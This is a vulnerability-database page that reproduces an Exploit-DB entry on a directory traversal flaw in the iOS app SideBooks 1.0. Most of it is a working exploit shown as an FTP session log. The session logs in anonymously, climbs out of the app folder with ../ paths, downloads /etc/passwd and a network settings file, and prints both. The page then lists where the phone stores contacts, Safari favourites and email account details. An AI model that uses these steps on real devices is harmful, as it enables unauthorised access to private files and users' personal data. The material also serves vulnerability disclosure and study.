Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

iOS SideBooks 1.0 - Directory Traversal

🗓️ 22 Feb 2011 00:00:00Reported by R3d@l3rt, Sp@2K, SunlightType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 30 Views

iOS SideBooks 1.0 Directory Traversal vulnerabilit

Code
# Exploit Title: SideBooks v1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight, Hackkey
# Software Link: http://itunes.apple.com/kr/app/sidebooks/id409777225?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the SideBooks.  
# Exploit Testing

C:\>ftp
ftp> open 192.168.0.70 2100
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 1
-rwxr-xr-x     1 mobile mobile    1948482 Dec 14 04:48 SideBooksManual.pdf
226 Transfer complete.
ftp: 84 bytes received in 0.02Seconds 5.25Kbytes/sec.
ftp> cd ../../../../../../../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 19
-rwxr-xr-x     1 root admin         30 Oct 26 01:20 Applications
drwxrwxr-x     1 root admin         68 Aug 19 04:10 Developer
drwxrwxr-x     1 root admin        884 Jan 12 12:53 Library
drwxr-xr-x     1 root wheel        102 Aug 19 04:18 System
-rwxr-xr-x     1 root admin         11 Feb 21 08:13 User
drwxr-xr-x     1 root wheel       2074 Jan 13 09:52 bin
drwxr-xr-x     1 root admin         68 Oct 26 01:19 boot
-rw-r--r--     1 (null) (null)        638 Jan 25 15:30 control
drwxrwxr-x     1 root admin         68 Aug 03 12:41 cores
----------     1 (null) (null)          0 (null) dev
-rwxr-xr-x     1 root admin         11 Aug 26 05:20 etc
drwxr-xr-x     1 root admin         68 Oct 26 01:19 lib
drwxr-xr-x     1 root admin         68 Oct 26 01:19 mnt
drwxr-xr-x     1 root wheel        136 Oct 23 15:12 private
drwxr-xr-x     1 root wheel       1666 Jan 13 09:52 sbin
-rwxr-xr-x     1 root admin         15 Aug 26 05:20 tmp
drwxr-xr-x     1 root wheel        374 Jan 13 09:52 usr
-rwxr-xr-x     1 root admin         11 Aug 26 05:20 var
226 Transfer complete.
ftp: 1111 bytes received in 0.02Seconds 69.44Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get /../../../../../../private/var/mobile/Library/Preferences/com.apple.con
ference.plist
200 PORT command successful.
150 Opening BINARY mode data connection for '/../../../../../../private/var/mobi
le/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 270 bytes received in 0.00Seconds 270000.00Kbytes/sec.
ftp> quit

C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:XX:XX:bc:XX? XnatFlag
C:\>



# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Feb 2011 00:00Current
7High risk
Vulners AI Score7
sidebooks v1.0iosdirectory traversalexploit titleiphoneipod touchr3d@l3rtsp@2ksunlighthackkeysoftware linkversion 1.0exploit testingdirectory traversal vulnerabilityiphoneipod 3gs4.2.1 firmwareftp/etc/passwd/private/var/mobile/library/preferences/com.apple.conference.plistphone booksafari favorites
30